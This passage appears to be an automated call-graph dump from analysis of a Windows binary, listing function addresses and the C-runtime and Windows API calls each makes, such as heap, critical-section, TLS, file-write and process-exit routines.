calls 5898->5899 5900 371c1d66 ReadFile 5899->5900 5901 371c1d7d CloseHandle DeleteFileW 5900->5901 5902 371c1d94 CloseHandle DeleteFileW 5900->5902 5901->5903 5902->5903 5903->5871 5904 371c1ede 5903->5904 5906 371c222f 5904->5906 5907 371c224e 5906->5907 5910 371c2250 5906->5910 5922 371c474f 5906->5922 5927 371c47e5 5906->5927 5907->5872 5909 371c2908 5911 371c35d2 RaiseException 5909->5911 5910->5909 5934 371c35d2 5910->5934 5913 371c2925 5911->5913 5913->5872 5915 371c160c 5914->5915 5916 371c163c lstrlenW 5915->5916 6022 371c1c9d 5916->6022 5918 371c1655 lstrcatW lstrlenW 5919 371c1678 5918->5919 5920 371c167e lstrcatW 5919->5920 5921 371c1693 5919->5921 5920->5921 5921->5872 5937 371c4793 5922->5937 5924 371c4765 5943 371c2ada 5924->5943 5926 371c478f 5926->5906 5933 371c56d0 5927->5933 5928 371c570e 5956 371c6368 5928->5956 5930 371c56f9 RtlAllocateHeap 5931 371c570c 5930->5931 5930->5933 5931->5906 5932 371c474f 7 API calls 5932->5933 5933->5928 5933->5930 5933->5932 5935 371c35f2 RaiseException 5934->5935 5935->5909 5938 371c479f 5937->5938 5950 371c5671 RtlEnterCriticalSection 5938->5950 5940 371c47aa 5951 371c47dc 5940->5951 5942 371c47d1 5942->5924 5944 371c2ae5 IsProcessorFeaturePresent 5943->5944 5945 371c2ae3 5943->5945 5947 371c2b58 5944->5947 5945->5926 5955 371c2b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5947->5955 5949 371c2c3b 5949->5926 5950->5940 5954 371c56b9 RtlLeaveCriticalSection 5951->5954 5953 371c47e3 5953->5942 5954->5953 5955->5949 5959 371c5b7a GetLastError 5956->5959 5960 371c5b99 5959->5960 5961 371c5b93 5959->5961 5965 371c5bf0 SetLastError 5960->5965 5985 371c637b 5960->5985 5978 371c5e08 5961->5978 5967 371c5bf9 5965->5967 5966 371c5bb3 5992 371c571e 5966->5992 5967->5931 5971 371c5bb9 5973 371c5be7 SetLastError 5971->5973 5972 371c5bcf 6005 371c593c 5972->6005 5973->5967 5976 371c571e 17 API calls 5977 371c5be0 5976->5977 5977->5965 5977->5973 6010 371c5c45 5978->6010 5980 371c5e2f 5981 371c5e47 TlsGetValue 5980->5981 5982 371c5e3b 5980->5982 5981->5982 5983 371c2ada 5 API calls 5982->5983 5984 371c5e58 5983->5984 5984->5960 5991 371c6388 5985->5991 5986 371c63c8 5988 371c6368 19 API calls 5986->5988 5987 371c63b3 RtlAllocateHeap 5989 371c5bab 5987->5989 5987->5991 5988->5989 5989->5966 5998 371c5e5e 5989->5998 5990 371c474f 7 API calls 5990->5991 5991->5986 5991->5987 5991->5990 5993 371c5729 HeapFree 5992->5993 5994 371c5752 5992->5994 5993->5994 5995 371c573e 5993->5995 5994->5971 5996 371c6368 18 API calls 5995->5996 5997 371c5744 GetLastError 5996->5997 5997->5994 5999 371c5c45 5 API calls 5998->5999 6000 371c5e85 5999->6000 6001 371c5ea0 TlsSetValue 6000->6001 6002 371c5e94 6000->6002 6001->6002 6003 371c2ada 5 API calls 6002->6003 6004 371c5bc8 6003->6004 6004->5966 6004->5972 6016 371c5914 6005->6016 6011 371c5c75 6010->6011 6012 371c5c71 6010->6012 6011->5980 6012->6011 6013 371c5ce1 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 6012->6013 6014 371c5c95 6012->6014 6013->6012 6014->6011 6015 371c5ca1 GetProcAddress 6014->6015 6015->6011 6017 371c5854 RtlEnterCriticalSection RtlLeaveCriticalSection 6016->6017 6018 371c5938 6017->6018 6019 371c58c4 6018->6019 6020 371c5758 20 API calls 6019->6020 6021 371c58e8 6020->6021 6021->5976 6023 371c1ca6 6022->6023 6023->5918 7558 371c73d5 7559 371c73e1 7558->7559 7570 371c5671 RtlEnterCriticalSection 7559->7570 7561 371c73e8 7562 371c8be3 27 API calls 7561->7562 7563 371c73f7 7562->7563 7569 371c7406 7563->7569 7571 371c7269 GetStartupInfoW 7563->7571 7568 371c7417 7582 371c7422 7569->7582 7570->7561 7572 371c7318 7571->7572 7573 371c7286 7571->7573 7577 371c731f 7572->7577 7573->7572 7574 371c8be3 27 API calls 7573->7574 7575 371c72af 7574->7575 7575->7572 7576 371c72dd GetFileType 7575->7576 7576->7575 7579 371c7326 7577->7579 7578 371c7369 GetStdHandle 7578->7579 7579->7578 7580 371c73d1 7579->7580 7581 371c737c GetFileType 7579->7581 7580->7569 7581->7579 7585 371c56b9 RtlLeaveCriticalSection 7582->7585 7584 371c7429 7584->7568 7585->7584 7586 371c4ed7 7587 371c6d60 51 API calls 7586->7587 7588 371c4ee9 7587->7588 7597 371c7153 GetEnvironmentStringsW 7588->7597 7591 371c4ef4 7593 371c571e 20 API calls 7591->7593 7594 371c4f29 7593->7594 7595 371c4eff 7596 371c571e 20 API calls 7595->7596 7596->7591 7598 371c716a 7597->7598 7608 371c71bd 7597->7608 7601 371c7170 WideCharToMultiByte 7598->7601 7599 371c4eee 7599->7591 7609 371c4f2f 7599->7609 7600 371c71c6 FreeEnvironmentStringsW 7600->7599 7602 371c718c 7601->7602 7601->7608 7603 371c56d0 21 API calls 7602->7603 7604 371c7192 7603->7604 7605 371c7199 WideCharToMultiByte 7604->7605 7606 371c71af 7604->7606 7605->7606 7607 371c571e 20 API calls 7606->7607 7607->7608 7608->7599 7608->7600 7610 371c4f44 7609->7610 7611 371c637b 20 API calls 7610->7611 7612 371c4f6b 7611->7612 7614 371c4fcf 7612->7614 7616 371c637b 20 API calls 7612->7616 7617 371c4fd1 7612->7617 7618 371c544d 26 API calls 7612->7618 7621 371c4ff3 7612->7621 7624 371c571e 20 API calls 7612->7624 7613 371c571e 20 API calls 7615 371c4fe9 7613->7615 7614->7613 7615->7595 7616->7612 7619 371c5000 20 API calls 7617->7619 7618->7612 7620 371c4fd7 7619->7620 7622 371c571e 20 API calls 7620->7622 7623 371c62bc 11 API calls 7621->7623 7622->7614 7625 371c4fff 7623->7625 7624->7612 7247 371c3c90 RtlUnwind 7626 371c36d0 7627 371c36e2 7626->7627 7629 371c36f0 7626->7629 7628 371c2ada 5 API calls 7627->7628 7628->7629 6677 371c5351 6678 371c5360 6677->6678 6682 371c5374 6677->6682 6680 371c571e 20 API calls 6678->6680 6678->6682 6679 371c571e 20 API calls 6681 371c5386 6679->6681 6680->6682 6683 371c571e 20 API calls 6681->6683 6682->6679 6684 371c5399 6683->6684 6685 371c571e 20 API calls 6684->6685 6686 371c53aa 6685->6686 6687 371c571e 20 API calls 6686->6687 6688 371c53bb 6687->6688 6101 371c220c 6102 371c221a 6101->6102 6103 371c2215 6101->6103 6111 371c20db 6102->6111 6107 371c22b1 6103->6107 6106 371c2228 6108 371c22c7 6107->6108 6110 371c22d0 6108->6110 6119 371c2264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6108->6119 6110->6102 6112 371c20e7 6111->6112 6116 371c210b 6112->6116 6118 371c20f6 6112->6118 6120 371c1eec 6112->6120 6114 371c216d 6115 371c1eec 50 API calls 6114->6115 6114->6118 6115->6118 6116->6114 6117 371c1eec 50 API calls 6116->6117 6116->6118 6117->6114 6118->6106 6119->6110 6121 371c1f2a 6120->6121 6122 371c1ef7 6120->6122 6163 371c2049 6121->6163 6124 371c1f1c 6122->6124 6125 371c1efc 6122->6125 6145 371c1f3f 6124->6145 6126 371c1f01 6125->6126 6127 371c1f12 6125->6127 6131 371c1f06 6126->6131 6132 371c240b 6126->6132 6137 371c23ec 6127->6137 6131->6116 6177 371c53e5 6132->6177 6286 371c3513 6137->6286 6140 371c23f5 6140->6131 6143 371c2408 6143->6131 6144 371c351e 7 API calls 6144->6140 6146 371c1f4b 6145->6146 6304 371c247c 6146->6304 6148 371c1f52 6149 371c1f7c 6148->6149 6150 371c2041 6148->6150 6157 371c1f57 6148->6157 6315 371c23de 6149->6315 6331 371c2639 IsProcessorFeaturePresent 6150->6331 6153 371c2048 6154 371c1f8b 6154->6157 6318 371c22fc RtlInitializeSListHead 6154->6318 6156 371c1f99 6319 371c46c5 6156->6319 6157->6131 6161 371c1fb8 6161->6157 6327 371c4669 6161->6327 6165 371c2055 6163->6165 6164 371c205e 6164->6131 6165->6164 6166 371c207d 6165->6166 6167 371c20d3 6165->6167 6408 371c244c 6166->6408 6168 371c2639 4 API calls 6167->6168 6170 371c20da 6168->6170 6171 371c2082 6417 371c2308 6171->6417 6173 371c2087 6420 371c20c4 6173->6420 6175 371c209f 6423 371c260b 6175->6423 6183 371c5aca 6177->6183 6180 371c351e 6257 371c3820 6180->6257 6182 371c2415 6182->6131 6184 371c5ad4 6183->6184 6187 371c2410 6183->6187 6185 371c5e08 11 API calls 6184->6185 6186 371c5adb 6185->6186 6186->6187 6188 371c5e5e 11 API calls 6186->6188 6187->6180 6189 371c5aee 6188->6189 6191 371c59b5 6189->6191 6192 371c59c0 6191->6192 6193 371c59d0 6191->6193 6197 371c59d6 6192->6197 6193->6187 6196 371c571e 20 API calls 6196->6193 6198 371c59e9 6197->6198 6199 371c59ef 6197->6199 6200 371c571e 20 API calls 6198->6200 6201 371c571e 20 API calls 6199->6201 6200->6199 6202 371c59fb 6201->6202 6203 371c571e 20 API calls 6202->6203 6204 371c5a06 6203->6204 6205 371c571e 20 API calls 6204->6205 6206 371c5a11 6205->6206 6207 371c571e 20 API calls 6206->6207 6208 371c5a1c 6207->6208 6209 371c571e 20 API calls 6208->6209 6210 371c5a27 6209->6210 6211 371c571e 20 API calls 6210->6211 6212 371c5a32 6211->6212 6213 371c571e 20 API calls 6212->6213 6214 371c5a3d 6213->6214 6215 371c571e 20 API calls 6214->6215 6216 371c5a48 6215->6216 6217 371c571e 20 API calls 6216->6217 6218 371c5a56 6217->6218 6223 371c589c 6218->6223 6229 371c57a8 6223->6229 6225 371c58c0 6226 371c58ec 6225->6226 6241 371c5809 6226->6241 6228 371c5910 6228->6196 6230 371c57b4 6229->6230 6237 371c5671 RtlEnterCriticalSection 6230->6237 6232 371c57e8 6238 371c57fd 6232->6238 6234 371c57be 6234->6232 6236 371c571e 20 API calls 6234->6236 6235 371c57f5 6235->6225 6236->6232 6237->6234 6239 371c56b9 RtlLeaveCriticalSection 6238->6239 6240 371c5807 6239->6240 6240->6235 6242 371c5815 6241->6242 6249 371c5671 RtlEnterCriticalSection 6242->6249 6244 371c581f 6250 371c5a7f 6244->6250 6246 371c5832 6254 371c5848 6246->6254 6248 371c5840 6248->6228 6249->6244 6251 371c5ab5 6250->6251 6252 371c5a8e 6250->6252 6251->6246 6252->6251 6253 371c7cc2 20 API calls 6252->6253 6253->6251 6255 371c56b9 RtlLeaveCriticalSection 6254->6255 6256 371c5852 6255->6256 6256->6248 6258 371c382d 6257->6258 6259 371c384b 6257->6259 6262 371c383b 6258->6262 6263 371c3b67 6258->6263 6259->6182 6268 371c3ba2 6262->6268 6273 371c3a82 6263->6273 6265 371c3b81 6266 371c3b99 TlsGetValue 6265->6266 6267 371c3b8d 6265->6267 6266->6267 6267->6262 6269 371c3a82 5 API calls 6268->6269 6270 371c3bbc 6269->6270 6271 371c3bd7 TlsSetValue 6270->6271 6272 371c3bcb 6270->6272 6271->6272 6272->6259 6274 371c3aaa 6273->6274 6278 371c3aa6 6273->6278 6274->6278 6279 371c39be 6274->6279 6277 371c3ac4 GetProcAddress 6277->6278 6278->6265 6284 371c39cd 6279->6284 6280 371c3a77 6280->6277 6280->6278 6281 371c39ea LoadLibraryExW 6282 371c3a05 GetLastError 6281->6282 6281->6284 6282->6284 6283 371c3a60 FreeLibrary 6283->6284 6284->6280 6284->6281 6284->6283 6285 371c3a38 LoadLibraryExW 6284->6285 6285->6284 6292 371c3856 6286->6292 6288 371c23f1 6288->6140 6289 371c53da 6288->6289 6290 371c5b7a 20 API calls 6289->6290 6291 371c23fd 6290->6291 6291->6143 6291->6144 6293 371c385f 6292->6293 6294 371c3862 GetLastError 6292->6294 6293->6288 6295 371c3b67 6 API calls 6294->6295 6296 371c3877 6295->6296 6297 371c38dc SetLastError 6296->6297 6298 371c3ba2 6 API calls 6296->6298 6303 371c3896 6296->6303 6297->6288 6299 371c3890 6298->6299 6300 371c38b8 6299->6300 6301 371c3ba2 6 API calls 6299->6301 6299->6303 6302 371c3ba2 6 API calls 6300->6302 6300->6303 6301->6300 6302->6303 6303->6297 6305 371c2485 6304->6305 6335 371c2933 IsProcessorFeaturePresent 6305->6335 6309 371c2496 6310 371c249a 6309->6310 6346 371c53c8 6309->6346 6310->6148 6313 371c24b1 6313->6148 6402 371c24b5 6315->6402 6317 371c23e5 6317->6154 6318->6156 6321 371c46dc 6319->6321 6320 371c2ada 5 API calls 6322 371c1fad 6320->6322 6321->6320 6322->6157 6323 371c23b3 6322->6323 6324 371c23b8 6323->6324 6325 371c2933 IsProcessorFeaturePresent 6324->6325 6326 371c23c1 6324->6326 6325->6326 6326->6161 6328 371c4698 6327->6328 6329 371c2ada 5 API calls 6328->6329 6330 371c46c1 6329->6330 6330->6157 6332 371c264e 6331->6332 6333 371c26f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6332->6333 6334 371c2744 6333->6334 6334->6153 6336 371c2491 6335->6336 6337 371c34ea 6336->6337 6338 371c34ef 6337->6338 6357 371c3936 6338->6357 6342 371c3505 6343 371c3510 6342->6343 6371 371c3972 6342->6371 6343->6309 6345 371c34fd 6345->6309 6394 371c7457 6346->6394 6349 371c3529 6350 371c3543 6349->6350 6351 371c3532 6349->6351 6350->6310 6352 371c391b 6 API calls 6351->6352 6353 371c3537 6352->6353 6354 371c3972 RtlDeleteCriticalSection 6353->6354 6355 371c353c 6354->6355 6398 371c3c50 6355->6398 6359 371c393f 6357->6359 6360 371c3968 6359->6360 6362 371c34f9 6359->6362 6375 371c3be0 6359->6375 6361 371c3972 RtlDeleteCriticalSection 6360->6361 6361->6362 6362->6345 6363 371c38e8 6362->6363 6380 371c3af1 6363->6380 6366 371c3ba2 6 API calls 6368 371c390b 6366->6368 6367 371c3918 6367->6342 6368->6367 6385 371c391b 6368->6385 6370 371c38fd 6370->6342 6372 371c397d 6371->6372 6374 371c399c 6371->6374 6373 371c3987 RtlDeleteCriticalSection 6372->6373 6373->6373 6373->6374 6374->6345 6376 371c3a82 5 API calls 6375->6376 6377 371c3bfa 6376->6377 6378 371c3c18 InitializeCriticalSectionAndSpinCount 6377->6378 6379 371c3c03 6377->6379 6378->6379 6379->6359 6381 371c3a82 5 API calls 6380->6381 6382 371c3b0b 6381->6382 6383 371c3b24 TlsAlloc 6382->6383 6384 371c38f2 6382->6384 6384->6366 6384->6370 6386 371c3925 6385->6386 6387 371c392b 6385->6387 6389 371c3b2c 6386->6389 6387->6370 6390 371c3a82 5 API calls 6389->6390 6391 371c3b46 6390->6391 6392 371c3b5e TlsFree 6391->6392 6393 371c3b52 6391->6393 6392->6393 6393->6387 6397 371c7470 6394->6397 6395 371c2ada 5 API calls 6396 371c24a3 6395->6396 6396->6313 6396->6349 6397->6395 6399 371c3c7f 6398->6399 6401 371c3c59 6398->6401 6399->6350 6400 371c3c69 FreeLibrary 6400->6401 6401->6399 6401->6400 6403 371c24c8 6402->6403 6404 371c24c4 6402->6404 6405 371c2639 4 API calls 6403->6405 6406 371c24d5 6403->6406 6404->6317 6407 371c2559 6405->6407 6406->6317 6409 371c2451 6408->6409 6410 371c2455 6409->6410 6412 371c2461 6409->6412 6429 371c527a 6410->6429 6414 371c246e 6412->6414 6432 371c499b 6412->6432 6414->6171 6507 371c34c7 RtlInterlockedFlushSList 6417->6507 6419 371c2312 6419->6173 6509 371c246f 6420->6509 6422 371c20c9 6422->6175 6424 371c2617 6423->6424 6425 371c262d 6424->6425 6528 371c53ed 6424->6528 6425->6164 6428 371c3529 8 API calls 6428->6425 6454 371c5132 6429->6454 6433 371c49a7 6432->6433 6434 371c49bf 6433->6434 6476 371c4af5 GetModuleHandleW 6433->6476 6485 371c5671 RtlEnterCriticalSection 6434->6485 6437 371c49c7 6442 371c4a3c 6437->6442 6450 371c527a 20 API calls 6437->6450 6452 371c4a65 6437->6452 6443 371c4a54 6442->6443 6447 371c4669 5 API calls 6442->6447 6448 371c4669 5 API calls 6443->6448 6444 371c4aae 6497 371cbdc9 6444->6497 6445 371c4a82 6489 371c4ab4 6445->6489 6447->6443 6448->6452 6450->6442 6486 371c4aa5 6452->6486 6457 371c50e1 6454->6457 6456 371c245f 6456->6171 6458 371c50ed 6457->6458 6465 371c5671 RtlEnterCriticalSection 6458->6465 6460 371c50fb 6466 371c515a 6460->6466 6464 371c5119 6464->6456 6465->6460 6469 371c5182 6466->6469 6470 371c517a 6466->6470 6467 371c2ada 5 API calls 6468 371c5108 6467->6468 6472 371c5126 6468->6472 6469->6470 6471 371c571e 20 API calls 6469->6471 6470->6467 6471->6470 6475 371c56b9 RtlLeaveCriticalSection 6472->6475 6474 371c5130 6474->6464 6475->6474 6477 371c49b3 6476->6477 6477->6434 6478 371c4b39 GetModuleHandleExW 6477->6478 6479 371c4b63 GetProcAddress 6478->6479 6484 371c4b78 6478->6484 6479->6484 6480 371c4b8c FreeLibrary 6481 371c4b95 6480->6481 6482 371c2ada 5 API calls 6481->6482 6483 371c4b9f 6482->6483 6483->6434 6484->6480 6484->6481 6485->6437 6500 371c56b9 RtlLeaveCriticalSection 6486->6500 6488 371c4a7e 6488->6444 6488->6445 6501 371c6025 6489->6501 6492 371c4ae2 6495 371c4b39 8 API calls 6492->6495 6493 371c4ac2 GetPEB 6493->6492 6494 371c4ad2 GetCurrentProcess TerminateProcess 6493->6494 6494->6492 6496 371c4aea ExitProcess 6495->6496 6498 371c2ada 5 API calls 6497->6498 6499 371cbdd4 6498->6499 6499->6499 6500->6488 6502 371c604a 6501->6502 6506 371c6040 6501->6506 6503 371c5c45 5 API calls 6502->6503 6503->6506 6504 371c2ada 5 API calls 6505 371c4abe 6504->6505 6505->6492 6505->6493 6506->6504 6508 371c34d7 6507->6508 6508->6419 6514 371c53ff 6509->6514 6512 371c391b 6 API calls 6513 371c354d 6512->6513 6513->6422 6517 371c5c2b 6514->6517 6518 371c5c35 6517->6518 6519 371c2476 6517->6519 6521 371c5db2 6518->6521 6519->6512 6522 371c5c45 5 API calls 6521->6522 6523 371c5dd9 6522->6523 6524 371c5df1 TlsFree 6523->6524 6527 371c5de5 6523->6527 6524->6527 6525 371c2ada 5 API calls 6526 371c5e02 6525->6526 6526->6519 6527->6525 6531 371c74da 6528->6531 6533 371c74f3 6531->6533 6532 371c2ada 5 API calls 6534 371c2625 6532->6534 6533->6532 6534->6428 6689 371c724e GetProcessHeap 6690 371c284f 6691 371c2882 27 API calls 6690->6691 6692 371c285d 6691->6692 6693 371c5348 6694 371c3529 8 API calls 6693->6694 6695 371c534f 6694->6695 6696 371c7b48 6706 371c8ebf 6696->6706 6700 371c7b55 6719 371c907c 6700->6719 6703 371c7b7f 6704 371c571e 20 API calls 6703->6704 6705 371c7b8a 6704->6705 6723 371c8ec8 6706->6723 6708 371c7b50 6709 371c8fdc 6708->6709 6710 371c8fe8 6709->6710 6743 371c5671 RtlEnterCriticalSection 6710->6743 6712 371c8ff3 6713 371c905e 6712->6713 6716 371c9032 RtlDeleteCriticalSection 6712->6716 6744 371ca09c 6712->6744 6757 371c9073 6713->6757 6715 371c906a 6715->6700 6718 371c571e 20 API calls 6716->6718 6718->6712 6720 371c7b64 RtlDeleteCriticalSection 6719->6720 6721 371c9092 6719->6721 6720->6700 6720->6703 6721->6720 6722 371c571e 20 API calls 6721->6722 6722->6720 6724 371c8ed4 6723->6724 6733 371c5671 RtlEnterCriticalSection 6724->6733 6726 371c8f77 6738 371c8f97 6726->6738 6729 371c8f83 6729->6708 6731 371c8e78 66 API calls 6732 371c8ee3 6731->6732 6732->6726 6732->6731 6734 371c7b94 RtlEnterCriticalSection 6732->6734 6735 371c8f6d 6732->6735 6733->6732 6734->6732 6741 371c7ba8 RtlLeaveCriticalSection 6735->6741 6737 371c8f75 6737->6732 6742 371c56b9 RtlLeaveCriticalSection 6738->6742 6740 371c8f9e 6740->6729 6741->6737 6742->6740 6743->6712 6745 371ca0a8 6744->6745 6746 371ca0ce 6745->6746 6747 371ca0b9 6745->6747 6749 371ca0c9 6746->6749 6760 371c7b94 RtlEnterCriticalSection 6746->6760 6748 371c6368 20 API calls 6747->6748 6751 371ca0be 6748->6751 6749->6712 6753 371c62ac 26 API calls 6751->6753 6752 371ca0ea 6761 371ca026 6752->6761 6753->6749 6755 371ca0f5 6777 371ca112 6755->6777 7041 371c56b9 RtlLeaveCriticalSection 6757->7041 6759 371c907a 6759->6715 6760->6752 6762 371ca048 6761->6762 6763 371ca033 6761->6763 6768 371ca043 6762->6768 6780 371c8e12 6762->6780 6764 371c6368 20 API calls 6763->6764 6765 371ca038 6764->6765 6767 371c62ac 26 API calls 6765->6767 6767->6768 6768->6755 6770 371c907c 20 API calls 6771 371ca064 6770->6771 6786 371c7a5a 6771->6786 6773 371ca06a 6793 371cadce 6773->6793 6776 371c571e 20 API calls 6776->6768 7040 371c7ba8 RtlLeaveCriticalSection 6777->7040 6779 371ca11a 6779->6749 6781 371c8e2a 6780->6781 6782 371c8e26 6780->6782 6781->6782 6783 371c7a5a 26 API calls 6781->6783 6782->6770 6784 371c8e4a 6783->6784 6808 371c9a22 6784->6808 6787 371c7a7b 6786->6787 6788 371c7a66 6786->6788 6787->6773 6789 371c6368 20 API calls 6788->6789 6790 371c7a6b 6789->6790 6791 371c62ac 26 API calls 6790->6791 6792 371c7a76 6791->6792 6792->6773 6794 371caddd 6793->6794 6795 371cadf2 6793->6795 6796 371c6355 20 API calls 6794->6796 6797 371cae2d 6795->6797 6802 371cae19 6795->6802 6799 371cade2 6796->6799 6798 371c6355 20 API calls 6797->6798 6800 371cae32 6798->6800 6801 371c6368 20 API calls 6799->6801 6803 371c6368 20 API calls 6800->6803 6806 371ca070 6801->6806 6997 371cada6 6802->6997 6805 371cae3a 6803->6805 6807 371c62ac 26 API calls 6805->6807 6806->6768 6806->6776 6807->6806 6809 371c9a2e 6808->6809 6810 371c9a36 6809->6810 6813 371c9a4e 6809->6813 6833 371c6355 6810->6833 6812 371c9aec 6815 371c6355 20 API calls 6812->6815 6813->6812 6818 371c9a83 6813->6818 6817 371c9af1 6815->6817 6816 371c6368 20 API calls 6828 371c9a43 6816->6828 6819 371c6368 20 API calls 6817->6819 6836 371c8c7b RtlEnterCriticalSection 6818->6836 6821 371c9af9 6819->6821 6823 371c62ac 26 API calls 6821->6823 6822 371c9a89 6824 371c9aba 6822->6824 6825 371c9aa5 6822->6825 6823->6828 6837 371c9b0d 6824->6837 6827 371c6368 20 API calls 6825->6827 6830 371c9aaa 6827->6830 6828->6782 6829 371c9ab5 6888 371c9ae4 6829->6888 6831 371c6355 20 API calls 6830->6831 6831->6829 6834 371c5b7a 20 API calls 6833->6834 6835 371c635a 6834->6835 6835->6816 6836->6822 6838 371c9b3b 6837->6838 6884 371c9b34 6837->6884 6839 371c9b5e 6838->6839 6840 371c9b3f 6838->6840 6843 371c9baf 6839->6843 6844 371c9b92 6839->6844 6842 371c6355 20 API calls 6840->6842 6841 371c2ada 5 API calls 6845 371c9d15 6841->6845 6846 371c9b44 6842->6846 6849 371c9bc5 6843->6849 6891 371ca00b 6843->6891 6847 371c6355 20 API calls 6844->6847 6845->6829 6848 371c6368 20 API calls 6846->6848 6850 371c9b97 6847->6850 6851 371c9b4b 6848->6851 6894 371c96b2 6849->6894 6854 371c6368 20 API calls 6850->6854 6855 371c62ac 26 API calls 6851->6855 6857 371c9b9f 6854->6857 6855->6884 6862 371c62ac 26 API calls 6857->6862 6858 371c9c0c 6863 371c9c66 WriteFile 6858->6863 6864 371c9c20 6858->6864 6859 371c9bd3 6860 371c9bf9 6859->6860 6861 371c9bd7 6859->6861 6906 371c9492 GetConsoleCP 6860->6906 6877 371c9ccd 6861->6877 6901 371c9645 6861->6901 6862->6884 6866 371c9c89 GetLastError 6863->6866 6874 371c9bef 6863->6874 6867 371c9c28 6864->6867 6868 371c9c56 6864->6868 6866->6874 6871 371c9c46 6867->6871 6875 371c9c2d 6867->6875 6932 371c9728 6868->6932 6924 371c98f5 6871->6924 6873 371c6368 20 API calls 6876 371c9cf2 6873->6876 6874->6877 6878 371c9ca9 6874->6878 6874->6884 6875->6877 6917 371c9807 6875->6917 6880 371c6355 20 API calls 6876->6880 6877->6873 6877->6884 6881 371c9cc4 6878->6881 6882 371c9cb0 6878->6882 6880->6884 6939 371c6332 6881->6939 6885 371c6368 20 API calls 6882->6885 6884->6841 6886 371c9cb5 6885->6886 6887 371c6355 20 API calls 6886->6887 6887->6884 6996 371c8c9e RtlLeaveCriticalSection 6888->6996 6890 371c9aea 6890->6828 6944 371c9f8d 6891->6944 6966 371c8dbc 6894->6966 6896 371c96c2 6897 371c96c7 6896->6897 6898 371c5af6 38 API calls 6896->6898 6897->6858 6897->6859 6899 371c96ea 6898->6899 6899->6897 6900 371c9708 GetConsoleMode 6899->6900 6900->6897 6902 371c969f 6901->6902 6905 371c966a 6901->6905 6902->6874 6903 371ca181 WriteConsoleW CreateFileW 6903->6905 6904 371c96a1 GetLastError 6904->6902 6905->6902 6905->6903 6905->6904 6914 371c94f5 6906->6914 6916 371c9607 6906->6916 6907 371c2ada 5 API calls 6908 371c9641 6907->6908 6908->6874 6910 371c79e6 40 API calls 6910->6914 6911 371c957b WideCharToMultiByte 6912 371c95a1 WriteFile 6911->6912 6911->6916 6913 371c962a GetLastError 6912->6913 6912->6914 6913->6916 6914->6910 6914->6911 6915 371c95d2 WriteFile 6914->6915 6914->6916 6975 371c7c19 6914->6975 6915->6913 6915->6914 6916->6907 6921 371c9816 6917->6921 6918 371c98d8 6920 371c2ada 5 API calls 6918->6920 6919 371c9894 WriteFile 6919->6921 6922 371c98da GetLastError 6919->6922 6923 371c98f1 6920->6923 6921->6918 6921->6919 6922->6918 6923->6874 6929 371c9904 6924->6929 6925 371c9a0f 6926 371c2ada 5 API calls 6925->6926 6928 371c9a1e 6926->6928 6927 371c9986 WideCharToMultiByte 6930 371c99bb WriteFile 6927->6930 6931 371c9a07 GetLastError 6927->6931 6928->6874 6929->6925 6929->6927 6929->6930 6930->6929 6930->6931 6931->6925 6933 371c9737 6932->6933 6934 371c97ea 6933->6934 6936 371c97a9 WriteFile 6933->6936 6935 371c2ada 5 API calls 6934->6935 6938 371c9803 6935->6938 6936->6933 6937 371c97ec GetLastError 6936->6937 6937->6934 6938->6874 6940 371c6355 20 API calls 6939->6940 6941 371c633d 6940->6941 6942 371c6368 20 API calls 6941->6942 6943 371c6350 6942->6943 6943->6884 6953 371c8d52 6944->6953 6946 371c9f9f 6947 371c9fb8 SetFilePointerEx 6946->6947 6948 371c9fa7 6946->6948 6949 371c9fd0 GetLastError 6947->6949 6952 371c9fac 6947->6952 6950 371c6368 20 API calls 6948->6950 6951 371c6332 20 API calls 6949->6951 6950->6952 6951->6952 6952->6849 6954 371c8d5f 6953->6954 6955 371c8d74 6953->6955 6956 371c6355 20 API calls 6954->6956 6958 371c6355 20 API calls 6955->6958 6960 371c8d99 6955->6960 6957 371c8d64 6956->6957 6959 371c6368 20 API calls 6957->6959 6961 371c8da4 6958->6961 6963 371c8d6c 6959->6963 6960->6946 6962 371c6368 20 API calls 6961->6962 6964 371c8dac 6962->6964 6963->6946 6965 371c62ac 26 API calls 6964->6965 6965->6963 6967 371c8dc9 6966->6967 6968 371c8dd6 6966->6968 6969 371c6368 20 API calls 6967->6969 6971 371c8de2 6968->6971 6972 371c6368 20 API calls 6968->6972 6970 371c8dce 6969->6970 6970->6896 6971->6896 6973 371c8e03 6972->6973 6974 371c62ac 26 API calls 6973->6974 6974->6970 6976 371c5af6 38 API calls 6975->6976 6977 371c7c24 6976->6977 6980 371c7a00 6977->6980 6981 371c7a28 6980->6981 6982 371c7a13 6980->6982 6981->6914 6982->6981 6984 371c7f0f 6982->6984 6985 371c7f1b 6984->6985 6986 371c5af6 38 API calls 6985->6986 6987 371c7f24 6986->6987 6988 371c5671 RtlEnterCriticalSection 6987->6988 6995 371c7f72 6987->6995 6989 371c7f42 6988->6989 6990 371c7f86 20 API calls 6989->6990 6991 371c7f56 6990->6991 6992 371c7f75 RtlLeaveCriticalSection 6991->6992 6993 371c7f69 6992->6993 6994 371c55a8 38 API calls 6993->6994 6993->6995 6994->6995 6995->6981 6996->6890 7000 371cad24 6997->7000 6999 371cadca 6999->6806 7001 371cad30 7000->7001 7011 371c8c7b RtlEnterCriticalSection 7001->7011 7003 371cad3e 7004 371cad65 7003->7004 7005 371cad70 7003->7005 7012 371cae4d 7004->7012 7007 371c6368 20 API calls 7005->7007 7008 371cad6b 7007->7008 7027 371cad9a 7008->7027 7010 371cad8d 7010->6999 7011->7003 7013 371c8d52 26 API calls 7012->7013 7016 371cae5d 7013->7016 7014 371cae63 7030 371c8cc1 7014->7030 7016->7014 7017 371cae95 7016->7017 7020 371c8d52 26 API calls 7016->7020 7017->7014 7018 371c8d52 26 API calls 7017->7018 7021 371caea1 CloseHandle 7018->7021 7023 371cae8c 7020->7023 7021->7014 7025 371caead GetLastError 7021->7025 7022 371caedd 7022->7008 7024 371c8d52 26 API calls 7023->7024 7024->7017 7025->7014 7026 371c6332 20 API calls 7026->7022 7039 371c8c9e RtlLeaveCriticalSection 7027->7039 7029 371cada4 7029->7010 7031 371c8d37 7030->7031 7032 371c8cd0 7030->7032 7033 371c6368 20 API calls 7031->7033 7032->7031 7037 371c8cfa 7032->7037 7034 371c8d3c 7033->7034 7035 371c6355 20 API calls 7034->7035 7036 371c8d27 7035->7036 7036->7022 7036->7026 7037->7036 7038 371c8d21 